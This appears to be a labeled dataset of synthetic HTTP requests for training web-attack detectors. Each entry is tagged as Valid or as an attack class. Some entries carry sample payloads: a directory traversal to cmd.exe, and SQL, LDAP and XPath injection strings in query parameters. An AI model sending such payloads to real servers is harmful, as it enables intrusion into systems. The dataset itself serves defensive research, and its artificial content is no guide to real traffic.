MIME-Version: 3.5
Pragma: UibIih4n='apr'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 77-,-9
Referer: /eIcrcp9w/h6a9be/ntiywem/ck9nI.dll
TE: trailers,trailers
Trailer: Host
User-Agent: a13n10e http://www.plviizl2.biz
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: FTP/0.1 www.brrsnuo.html
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35827
Start - Id: 29755
class: Valid
GET /l4rucedthnhrStlraO.php3? HTTP/1.0
Host: 42.71.78.27
Connection: keep-alive
Accept: image/gif, video/*, image/*
Accept-Charset: macintosh
Accept-Encoding: *
Accept-Language: Ms-y, E-u;q=0.1, w-tu6dva, i-te;q=0.9
Cache-Control: av=M
Client-ip: 78.44.8.103
Cookie: bi=shWgbsrnhiuH78eDN;ksam1VSqAqN6W=3451719;etnllxks=othLqzuoi
Cookie2: $Version="5"
Date: Sat, 18 Mar 06 05:48:43 GMT
ETag: W/"XKkFV1X.H33kCpiu"
Expect: 100-continue
From: aaaaonr@hEtmerN4em.biz
If-Modified-Since: Mon, 23 Feb 04 09:14:47 GMT
If-Unmodified-Since: Thu, 29 Dec 05 03:34:39 UTC
If-Match: "fQxZwtHESSL2Rvj"
If-None-Match: "o-8LlWKy4EzgBi2"
If-Range: Sat, 04 Mar 06 20:25:09 GMT
Max-Forwards: 86
MIME-Version: 3.4
Pragma: aarneioN='wh9am'
Proxy-Authorization: crSDqa Lrjm6ejj=na0tra
Authorization: Basic c3BsT2Z5OnMyY2lQbWVu
Range: -63132
Referer: http://www.dmset.de/ierqeera/tEelrmae/wnusoRr/4d8gu6he.swf
TE: trailers,chunked;q=0.7
Trailer: Warning
User-Agent: ereruearegged3Enouno
UA-CPU: Sparc
UA-Disp: 3607,6288,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2347x796
Via: HTTP/5.9 www.ehdlidi.jpg, 7.1 www.Aogjhoo.png
Transfer-Encoding: gzip
Upgrade: i9y/2.0, idocae/0.1, xaekJa/4.4
Warning: 753 www.efttkwyh.shtml:579 "e6anePoa6iqyxLntoI" "Tue, 19 Jul 05 20:12:55 UTC"
X-Forwarded-For: 234.217.103.7
X-Serial-Number: 889921
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29755
Start - Id: 15116
class: Valid
GET /tat4hei/e1ovon/i-qjcrjxnJq7uk6KJ/nBGRodnCzpGyaH2C/jhaw/edo/WHOMG8.3GT-oa/Rpia/nWmemrainobu.exe?ps=spasswdnodenl0a6&sezihg9iyote=helhdhrutXaGMjvtWh&VvbscriptFWt1_X3xtermG5=coaonua&attd=ehe%3Bekn&fStydegkl=344818&rnnyocchnNAvetN=nIa&ooeeeidayAvein=eiitdrmt1iReanosaO&ur=il_YokuP5K&ssofno1=mJl%40H5DD&lrYxae2sed1on=024&4v4xehttpFB=++ko&GpUEM0Bp2=eibt&5ird72rlLhdu=96&bHP3t8wh=1oh9 HTTP/1.0
Host: www.yArqf.uk
Connection: sonslvon
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: nemiz-cjra, ctga-i, N-aotl;q=0.9, egz-w;q=0.8, 9onHrr-y
Cache-Control: min-fresh=2132
Client-ip: 17.176.248.173
Cookie: oamao9o=450;Lps0aeer=a0gsl;yauemhmtwnstzdt=$a;ZHh9=idDbehrlwre0eure;lusnml=2ordd;eu1nLs=322904
Cookie2: $Version="53"
Date: Fri, 11 Sep 09 20:30:41 GMT
ETag: "zdd4ZWquwmU-WkDX"
Expect: lrsaot
From: imduseE@sjAjn.fr
If-Modified-Since: Thu, 26 Jan 06 03:38:09 UTC
If-Unmodified-Since: Sun, 04 Jan 09 02:39:52 GMT
If-Match: "PiD5s3DOItY@Uzvd4xK"
If-None-Match: "@R4TU_Jna4Aun4s"
If-Range: "V1XgWpbDHHASTVWz2bq"
Max-Forwards: 085
MIME-Version: 6.6
Pragma: inmnqtiA='m'
Proxy-Authorization: NTLM OWZsYUoxOGl0dHNhcmVyaWU4cm5vaHBtcnJkc25yTm5waGVs
Authorization: Digest opaque="antg1"
Range: 0106-,35444-9,-1
Referer: http://www.rsadt5.it/eiodnemi/EYat/afti.js
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: 0eDLLM9N http://www.ukotifu.de
UA-CPU: 68000
UA-Disp: 067,8316,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1621x334
Via: 0.5 236.243.201.38
Transfer-Encoding: compress
Upgrade: ehhxwE/2.3, hmises/8.0, sysh/3.4, xp28b/2.3, lpeer/5.8
Warning: 484 79.182.0.186 "vdrDggpdnIl5d9ttc" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 8017071775441
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15116
Start - Id: 44678
class: PathTransversal
GET /land.shtml?r7tcpgid=5liIxtermhhttps&Fis=s%2Fo&nttLmeitE6ahl=ern&HU3retcA57=n3P-GnTx&vnm0=uaOeq9Ntab49ehV&lANh=ecprocessing-instruction%3E51ulib1&ls=7nepssz0&3Fm8tEonbxs=TeubnIEw6yth&di=-ncati2ond&wu4ErRuri=379&olfS=008&lsegrbto=tZ2Toh&fabai=iqg&dsEtajnts=50Ve0UUfI HTTP/1.0
Host: 183.49.177.168:489
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Language: *;q=0.3
Cookie: rneme=%2e%2e.\%252f/\%252f/...\%252e..%2e;csauo=sh;njrnonbg=45437638
Cookie2: $Version="6"
Date: Wed, 07 Jul 04 04:29:34 GMT
If-Modified-Since: Tue, 21 Jul 09 10:42:12 GMT
If-None-Match: *
Max-Forwards: 4
Referer: /EmeAjih/ktlseo/xSoc/tfabflhn/ianTns.msf
User-Agent: gmnizNT9et6o0
UA-Color: color8
Upgrade: hyent/2.5, ya5e/2.2, ikle/3.7, gtlr/3.9
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44678
Start - Id: 22390
class: Valid
GET /xormochascripte/Peanklnielducetertsg/h2F/nXnAAq.KU/t4BeQ.jpeg?OmsZi3=nertmpw64i+T13BdRp1oEg&uiceres9w3=675&styleXdivExV=eo%2Boa%5BddropeirJlr%2Bhm&1uo=+&To0rnncwfIh=ne&ttn9=8gE2cat+tpassthruY HTTP/1.1
Host: www.ohVye.uk
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-korean, iso-8859-8-i
Accept-Encoding: compress;q=0.8, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 215.40.52.113
Cookie: 3t5oIaRs=omnn;LQEGxvrFy=nt2xMoes3aliconnectg;;PperllXNa=9882353
Cookie2: $Version="985"
Date: Tue, 07 Nov 06 16:33:00 GMT
ETag: W/"fF0hudqNHk-Pa6jxkj5"
Expect: mehpgn
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Fri, 12 Jan 07 24:47:16 GMT
If-Unmodified-Since: Wed, 25 Jan 06 12:41:04 UTC
If-Match: "xSEx_6fIgNyNB9FA5F"
If-None-Match: *
If-Range: *
Max-Forwards: 695
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: NTLM cWxkdE1xY2VPbDY4MmFoZWVkdGV5bW9xenlyUG5vZXBsYnJBYWlBcmhpc3l0UnNk
Range: 27-495
Referer: /3bVe/a7kw/erAx/hmuodsp.conf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 7sCpq4/0.5
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/1.7 www.ue92.html, 8.5 106.215.180.123, a5eC/2.9 134.93.37.126
Transfer-Encoding: identity
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22390
Start - Id: 30727
class: Valid
GET /teAEnrtJboEoYbn8eio/h@vc/un3oekrAbaxbf/MrL9/tetoia5ttRnnaawe/q29dHfNq_GservicesDz/e1/x_documentV5B.object2GBJboot.iniC3/zhTYWB2HI7j5-v.jsp?P%ufGabWFeMuB=1s%25op9a6lr&hooao=4058&-wgetcX=%5BallhA&zn4aei=aDh1 HTTP/1.1
Host: 26.25.29.209
Connection: close
Accept: image/png, text/*;q=0.7, audio/basic;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: heN-amolexe, dowdgG-1;q=0.3, a57M-r;q=0.7
Cache-Control: no-cache
Client-ip: 45.133.46.216
Cookie: eerelpdlbnu6R=hxYv-rt@sN;lm=9387841
Cookie2: $Version="545"
Date: Sat, 09 Sep 06 01:02:07 GMT
ETag: "BcxivruTmgxjLi._A"
Expect: gWsmmbl
From: dubt@tmrdi.net
If-Modified-Since: Thu, 17 Aug 06 22:05:57 CET
If-Unmodified-Since: Sat, 30 Aug 08 03:25:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 825
MIME-Version: 7.4
Pragma: linylsgX=es0s
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Digest username="tkaelef"
Range: 1-,-425,74618-
Referer: /nsclds/cSibt/weegE/jdkwWnls.ace
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Language
User-Agent: swbifv http://www.aoAsa.biz
UA-CPU: x86
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2445x5903
Via: Ocpt/9.4 231.191.254.140:7, HTTP/6.1 121.70.132.35:22097, 5.8 www.omha.shtml
Transfer-Encoding: gzip
Upgrade: uom4/0.1, suMtl/8.8
Warning: 309 www.mtrueg.jpeg:8 "enaoExpt2ech" "Sun, 23 Oct 05 23:02:27 CET"
X-Forwarded-For: 31.136.183.183
X-Serial-Number: 248623
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30727
Start - Id: 22518
class: Valid
GET /kstNlerdnnhsttIlwony/z4h5Lpk24I4i/uPC/47jVds3WlxKNM.X/NandV/nlqstplr/sx_36gam./sn-qIo@XmMO-.mspx?un=asmw2&5k2GHPO9.Exs=2tunqoot%29nodeceza9&lctnmqenn=iis0lo&ra=n%7CEC&sK2N9=inuLodinetcateUo2in4&ea=79location&orbrehO=eexecLtEP&ktlike7rmeta@LVpT=h+l06%5Cs4dr+rrdl HTTP/1.0
Host: 116.227.227.183:80
Connection: borerre
Accept: audio/basic;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: anisTel-Doy8njo
Cache-Control: no-cache
Client-ip: 214.83.237.34
Cookie: 9cnnw0ntenswnAe=mtolye5set;dr=95899934;0tee2Har=ixznDuXA3l;sbby1=raye;pini=dE 7eeawtmshoy0lf
Cookie2: $Version="767"
Date: Thu, 28 Jun 07 06:56:37 UTC
ETag: "z4OaVbtI6PaeC@x1_8Wl"
Expect: 100-continue
From: megsen@yhmnzeeaD.it
If-Modified-Since: Sat, 17 Dec 05 21:44:30 GMT
If-Unmodified-Since: Sat, 02 Oct 04 10:31:54 CET
If-Match: *
If-None-Match: "NiwbBM0QcwbxlC63"
If-Range: *
Max-Forwards: 502
MIME-Version: 6.4
Pragma: eu3sso=naistwht
Proxy-Authorization: scteog hyra=eonEzl1I
Authorization: Basic aXNlZWk5Ok53YWFzYQ==
Range: 97-403959,415744-,056-023107
Referer: /rtudn5S/isf0cic/tfopc.conf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.3 (Windows; U; Win98 1.2; un-nv; rv:4.3.8) Gecko/33334753
UA-CPU: Sparc
UA-Disp: 3911,9683,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 568x5684
Via: HTTP/3.9 200.124.217.147, 2.8 10.145.140.74, 3.0 www.ishh.shtml
Transfer-Encoding: e2dt; hCuhdsxo=kslpn
Upgrade: yul/1.8, gvic/9.5, hGaw/6.7, Hpe/9.6, dae/2.3
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 147.15.113.44
X-Serial-Number: 0827164
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22518
Start - Id: 32931
class: Valid
POST /yEpwkeu3w/aJ/aynteae/alTuNehb2etishl/unb/UroauubeeNvao8on/e3qqbGl/qMtwlcqtknayne/tHLz5ub.asp? HTTP/1.1
Content-Length: 111
Content-Language: Mmh,eysa6not,stnAo
Content-Encoding: identity
Content-Location: http://www.oeitjz.org/wodoteu.mspx
Content-MD5: b3dpcnVoc3RsYzNtdGlveQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Feb 08 08:29:34 GMT
Last-Modified: Wed, 13 Jan 10 08:29:14 UTC
Host: www.haEc.be
Connection: dssdraec
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: a-Ae4jns;q=0.6, v-tehcd, zadlMeo-nt;q=0.0, S-oss95an, e-dcrev;q=0.3
Cache-Control: no-cache
Client-ip: 78.142.236.170
Cookie: jebthjO=Tae co7laDngeyr7homs;N7tcetnnfhhk13=aZEqpsp2tyY;actwadeurLpgIHe=1874;iPbscripto=6768327792
Cookie2: $Version="73"
Date: Thu, 13 Nov 08 07:27:35 GMT
ETag: "0@CY0H.LM9MHonM4_Mj"
Expect: 100-continue
From: cpts@U3ei.ch
If-Modified-Since: Sat, 14 Mar 09 15:01:39 UTC
If-Unmodified-Since: Sat, 05 May 07 20:22:55 CET
If-Match: "FWwlQMehOWhHr1qC_fh"
If-None-Match: "KG2LlpxS2mb_blHRFEB"
If-Range: Wed, 23 Sep 09 22:34:53 CET
Max-Forwards: 456
MIME-Version: 2.7
Pragma: bse9tdE='dteewe9'
Proxy-Authorization: Digest response="a9BeE916BeBcFf88ab7Fa90c49BcFa2D"
Authorization: Digest qop=auth
Range: 5534-4
Referer: /6l0tfter/auFueal1/enty.pl
TE: trailers,chunked,chunked;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 5.6; po-rs; rv:6.5.9) Gecko/35393787
UA-CPU: 68000
UA-Disp: 6130,7497,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6323x133
Via: 7.7 164.73.199.121, HTTP/2.7 www.ttua.png:927
Transfer-Encoding: gzip
Upgrade: 6kra/2.6, aeln/1.8, nmsoir/6.4
Warning: 876 www.orvy.html "tnAsshstn706" "Tue, 06 Jun 06 21:03:37 CET"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2Mtmsee9xiotng= ioimgt&evhufi=e~&uuergSTa=nNte9dob&f8tt=276&x_@Ap@c=aG5&1shisEk=eco8ola&slb=iede/&ba2=27010

End - Id: 32931
Start - Id: 43981
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tan3e.it
Connection: WndiestS
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: Enasrf-5exafo, kl-Nnh;q=0.5, swI-tt;q=0.2, nhftR-o, 2vrb-ancli1n0;q=0.9
Cache-Control: no-store
Client-ip: 43.18.187.245
Cookie: fvpoqEtsiueneUu=whered;tw8oweoscmo=aa5zuweiy1-oV;eaxGusbb4etreS=icsmg5dDU02
Cookie2: $Version="84"
Date: Thu, 02 Nov 06 21:20:55 GMT
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: lwca=m8sg;eeCw
From: diou@el22.cz
If-Modified-Since: Wed, 10 Jun 09 21:13:12 CET
If-Unmodified-Since: Tue, 03 Jun 08 01:28:30 GMT
If-Match: *
If-None-Match: *
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Digest opaque="rpcs"
Range: -2,795-,-91
Referer: http://www.eadtts.gov/oresor.jsp
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.0 (X11; U; Linux i386 3.8; i8-2f; rv:4.2.2) Gecko/86631639
UA-CPU: x86
UA-Disp: 603,719,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2346x026
Via: FTP/3.1 www.gc620Um.tiff, ejia/9.3 68.147.38.229
Transfer-Encoding: gzip
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43981
Start - Id: 2417
class: Valid
GET /ooeuPysanekRo7sy2a0a/etteuwdsdafTbd6/t6Oe1ftse/63sgOQ/eQwSz3hJVZ@bB/eiaqrsiutobens/e_EGRUf6o5Jzp/y5B.php3?pnnnod8ideem=pnao HTTP/1.0
Host: 19.127.110.33:31444
Connection: close
Accept: text/*;q=0.8, video/*
Accept-Charset: iso-8859-15, ks_c_5601-1987;q=0.5
Accept-Encoding: identity;q=0.0, compress
Accept-Language: zc-kzoae9cl
Cache-Control: max-age=90649
Client-ip: 216.140.72.166
Cookie: rugwsr=[/ioqC;mKcHamhreareE=6103;wh= ;Ql5om=oeybeete= h;aurhis=40
Cookie2: $Version="897"
Date: Mon, 13 Oct 08 08:12:00 CET
ETag: W/"h6BO4lSOeHIukUAXMVV"
Expect: ytc7I=1iiltrt
From: 0talRina@qieneot.fr
If-Modified-Since: Sun, 09 Jan 05 12:20:10 UTC
If-Unmodified-Since: Sat, 09 Oct 04 14:55:04 UTC
If-Match: "uW4F_fhoVIBvr_5osigL"
If-None-Match: *
If-Range: *
Max-Forwards: 90
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bXZuNkV0cmI6cmF1b2VyZWU=
Authorization: Basic d05lZTppZGF0Vg==
Range: 69893-,12785-855,77-
Referer: /4itlpoa/ahr56t/eaRir2eS.asp
TE: chunked
Trailer: User-Agent
User-Agent: oNfha.Q9 http://www.idKhwhT.com
UA-CPU: Sparc
UA-Disp: 5566,8703,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 213x610
Via: Nmrbo/8.6 www.5aom.html, tco/4.7 183.113.105.120:6
Transfer-Encoding: deflate
Upgrade: e7e/6.9, s2Djif/7.0, h0Tni/4.2, ctah/9.9
Warning: 492 www.astoe3u.js "irotdAesefitoeiuos" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 222850324123398
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2417
Start - Id: 41725
class: SqlInjection
GET /mKedsLlf/w8tjEe.gif?sornhldd3rnr=%27++++OR+++++%27Teths%27+++++LIKE+++++%27aze%2525 HTTP/1.0
Host: www.tv8paauub.ch
Connection: nndateei
Accept: */*;q=0.9
Accept-Charset: cp-936;q=0.4, euc-cn;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 130.12.152.206
Cookie: _WoQ=idai;i7Qeufemcsst=gHi1se1znounnlag8;o8Hh9t4jM@=eOpjrt7t5C34t1h
Cookie2: $Version="483"
Date: Thu, 18 Feb 10 16:27:15 GMT
ETag: "YV7eIst2qzOuOaD_"
Expect: 100-continue
From: weLnae2@eCsehh7ca.cz
If-Modified-Since: Mon, 21 Aug 06 02:17:40 GMT
If-Unmodified-Since: Thu, 08 Jan 09 23:57:41 CET
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 92
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic cnF5cmFkbWk6N2kzM2Q=
Authorization: Basic M2llaUdzM2k6YW5uZWFkdA==
Range: 2985-,9268-37,-4
Referer: http://www.esnrs.st/tcur/etor/6eaequ.msf
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: Ltte (6NA3WBsw)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 431x0868
Via: HTTP/3.7 103.155.174.113
Transfer-Encoding: compress
Upgrade: aah/4.0
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 3549851527623289
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41725
Start - Id: 18109
class: Valid
GET /lo5YRumK9B/a8nF6hoG-EQ0o.P-l6J@/lO6afn5tsk/iMS4dI-cStbJ6/aNom59nna/8KDMEaV/mJThtacces/nullF--homeZzm/nrns/tEr-azYi9DlaOw2RNQt/onekojisbo/zsXqnzfUlbYg7R8.tiff?b0reoAUlrn=8&itaxa=014&odceefft=g9lb_uPRM&ah=3150&N7acceptEnT=35433&4nnea4r6s=tTJHO4fBPI6&ssgtae=9&iqvlni4asi9=92085951&iddVL8rM.TZVY=nt&le8q7a7simsdt=sMSytiTMC&Srrmoiidgp=52552 HTTP/1.1
Host: www.Ntdf6go.com
Connection: close
Accept: image/jpeg, audio/x-wav
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, gzip
Accept-Language: i5nst-ue
Cache-Control: max-age=32
Client-ip: 237.7.182.56
Cookie: eohweodrOh=rt5nz6bura5Drca8a2
Cookie2: $Version="192"
Date: Sun, 23 Sep 07 01:39:31 GMT
ETag: W/"fuXBEtERaZdePjWV"
Expect: 100-continue
From: oecjtte@aJits.ch
If-Modified-Since: Sun, 23 Nov 08 09:02:22 CET
If-Unmodified-Since: Wed, 08 Oct 08 22:03:26 GMT
If-Match: *
If-None-Match: "4ILo@4PuYoeE@9f5jiMA"
If-Range: Sat, 25 Feb 06 03:52:38 GMT
Max-Forwards: 824
MIME-Version: 5.1
Pragma: a='cmel'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: 5t8b eeii9=drtEA1Cw
Range: -232
Referer: http://www.hTseeeUh.it/aevc/am4eto/1t5cn/hcmeat2/1imlsWxs.png
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: d06Rei
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 259x791
Via: HTTP/5.2 www.a5nyoSE.jpeg:9, ieiR/2.4 23.84.178.81, FTP/1.5 www.etoe.png
Transfer-Encoding: compress
Upgrade: easn/7.4, sssja/2.0, iqc/5.0
Warning: 285 108.191.36.249 "oeiebe4a" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 818072952381662681
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18109
Start - Id: 38659
class: LdapInjection
GET /trode.shtml?mseammy6=00181&wxc7rtsb4i=odi&eq=eltd&edrstaran1=gbrR3xw&fnrortse=0TTb&QMSnfcwfkm=2sro%29%28%26%28objectClass%3D++e5*%29 HTTP/1.0
Host: 240.126.50.208:03
Connection: close
Accept: image/*, video/quicktime
Accept-Charset: x-mac-japanese, iso-8859-2;q=0.7, cp-932;q=0.1, gb2312, iso-8859-7;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: eechef0z-nUnzhj;q=0.6, ahafd-inl, sma-oeayl;q=0.3, mohfrn-pes
Cache-Control: min-fresh=1
Client-ip: 4.62.251.210
Cookie: tN1ceafehutcr1o=no hisee;5tb=i=Ae0aet )homee
Cookie2: $Version="360"
Date: Sat, 06 May 06 20:38:26 CET
ETag: W/"NDTNAThFdSCA-p."
Expect: aero=c3tei1ta;Aetl
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 03 Jun 07 24:33:36 GMT
If-Unmodified-Since: Sat, 20 May 06 13:50:14 CET
If-Match: *
If-None-Match: "aQporVpJiu_M_E7c27fM"
If-Range: Thu, 28 Feb 08 14:52:46 GMT
Max-Forwards: 931
Pragma: e=E
Authorization: fwae dceqqs=pxbnnee
Range: -3789,-5,300-00360
Referer: http://fbbiiRw6.ch/refiht/ngoud35.gif
TE: gzip,trailers,trailers
User-Agent: nXo5iczpD http://www.5ieoe.fr
Via: 1.3 136.98.143.241:3
----: -----------------

null

End - Id: 38659
Start - Id: 49026
class: XPathInjection
GET /tnz/fntAuenis/5dew/gT@FxdQV.jpeg?nuerf84kpe9uo=jatHir8n&doi5bNdoeUme=rubseuf%27++or+++eb%2FipiTs%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D209%5D++or++%27Fdrntmh%27%3D+%27&vWx03Dvu=516361 HTTP/1.1
Host: 222.127.61.240
Connection: close
Accept: */*
Accept-Charset: windows-874, windows-1258, macintosh
Accept-Encoding: compress, compress, deflate;q=0.1
Accept-Language: *;q=0.8
Cache-Control: min-fresh=3707
Client-ip: 218.235.95.33
Cookie: YlAe=e1aernratohami;hiic=hW.0d@gw;ar=52371;O9abpidxEaRApAz=8witrso;5gVwPxMX4=43503
Cookie2: $Version="4"
Date: Sun, 22 Feb 09 08:16:04 CET
ETag: W/"vWOlh.SNHcSZbS62QoaS"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 10 Feb 08 18:26:22 UTC
If-Unmodified-Since: Thu, 04 Feb 10 07:50:36 UTC
If-Match: *
If-None-Match: "ty_Ki87YMOpe8dpkshkX"
If-Range: *
Max-Forwards: 76
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: t597i7 s1mtW=e9ixee
Authorization: Digest algorithm=MD5-sess
Range: -31
Referer: /bTontin0/eenta/b1s6eutb/CpCiae3d.jsp
TE: deflate,chunked,trailers
Trailer: Pragma
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 1.5; sI-6u; rv:2.4.4) Gecko/03367958
UA-CPU: 68000
UA-Disp: 167,2899,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/2.4 159.197.112.36
Transfer-Encoding: compress
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00627692594
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49026
Start - Id: 5095
class: Valid
POST /t@uQ/dngehdctetcDhpi/x8.FnRuV4WWwU@HfFZ5I/gmeM4oBtu/eE13hH24-0Owya/nabunw/ejn87ehuahLAt4bogef.jsp? HTTP/1.1
Content-Length: 107
Content-Language: isw,mcwkos
Content-Encoding: compress
Content-Location: http://gSenRh.ch/f3ySce/wrs1ltn/5rws8Mto/josm.php4
Content-MD5: aXlsbTBoaEhoZzhUTWlBYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jul 09 18:52:20 CET
Last-Modified: Tue, 23 May 06 08:50:53 GMT
Host: 135.133.249.80
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 56.116.172.92
Cookie: mmaehilo=09677
Cookie2: $Version="427"
Date: Sun, 29 May 05 04:43:29 UTC
ETag: W/"-LSJnK.cmWDIZdXST9."
Expect: 100-continue
From: shorri@mlnSniydiv.gov
If-Modified-Since: Tue, 28 Nov 06 11:36:12 UTC
If-Unmodified-Since: Tue, 14 Dec 04 10:51:06 UTC
If-Match: *
If-None-Match: "GJqJxC9.-qTCM9xdA"
If-Range: "Z8V6IGl0bz6vQL@SF"
Max-Forwards: 8811
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Basic ZWhzcDpsdGlzcG4=
Range: 4666-,507125-81685,186998-
Referer: /auimo/uMn3/seie/etionod.conf
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.5 (X11; U; Solaris 5.6; ie-e5; rv:1.1.8) Gecko/98635096
UA-CPU: PowerPC
UA-Disp: 850,8218,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7848x0876
Via: FTP/1.1 www.mskn.tiff:43467
Transfer-Encoding: Rtsifd
Upgrade: efd74o/3.6, MmfD/3.2, o6ce/9.4
Warning: 172 www.tonle.shtml "itac7inoeo6towt2" "Fri, 23 May 08 05:18:47 CET"
X-Forwarded-For: 187.213.168.146
X-Serial-Number: 093025273
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

ntt=599404&h5oi0uwthnlai=ki7&mIjrahop= i: hts<locationunion3ads6&dtnpetti958rls=864&t1sniagteetoep= lys

End - Id: 5095
Start - Id: 35670
class: XPathInjection
